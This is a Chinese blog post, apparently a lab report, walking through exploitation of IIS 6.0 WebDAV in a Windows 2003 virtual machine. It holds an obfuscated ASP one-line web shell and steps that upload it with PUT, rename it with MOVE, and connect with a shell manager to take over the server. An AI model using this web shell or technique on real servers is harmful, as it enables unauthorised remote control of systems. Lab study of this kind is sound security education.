iis6.0漏洞

实验名称:iis 6.0 漏洞

实验环境:windows2003虚拟机,w10物理机

实验报告:

1、打开一台w3虚拟机,设置nat连接确保 和自己本机在同一局域网

2、在w3虚拟机安装iis服务器  按照下面步骤 进行勾选 确保可以使用asp文件

3、打开iis服务器,给默认网站设置权限

4、可以尝试先在 iis服务器的默认路径下 创建一个asp 文件

5、向asp文件写入一句话  保存 这是一个获取当前时间的代码

6、然后在 w10本机上 尝试访问一下  w3 ip地址加 a.asp 

7、在 windows2003 iis服务器的默认路径 找到wwwroot 文件 给来宾用户设置权限 

8、在 w10本机 打开 一个 iiswrite 软件 

 

9、然后在本机新建一个 txt 文件 然后往里面添加一句话

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("shezhang"))%>  

10、打开  iiswrite软件  设置put 上传  选择 刚才的txt 文件  域名写 w3 虚拟机的ip地址

因为 windows 拒接接受 aps 文件 所以上传 txt 文件

11、然后点击 提交数据包   点击后 提示上传成功为201  

12、返回w3虚拟机 查看iis默认路径 发现多了一个 test.txt

13、回到 w10 本机 对刚才上传的文件进行一个重命名 move  选择move 

第一行为 重命名的对象 名字

第二行是 ip地址

第三行是 重命名之后的名称

14、点击提交提示 207说明重命名成功 返回w3 虚拟机查看一下

15、打开 这个软件  右击空白处点击添加  地址为 w3的ip地址加这个脚本名 密码   点击添加

16、添加完 双击 刚才添加的  就可以直接进入到 w3虚拟机的系统

发布了8 篇原创文章 · 获赞 6 · 访问量 344

猜你喜欢

转载自blog.csdn.net/susu1031/article/details/105219117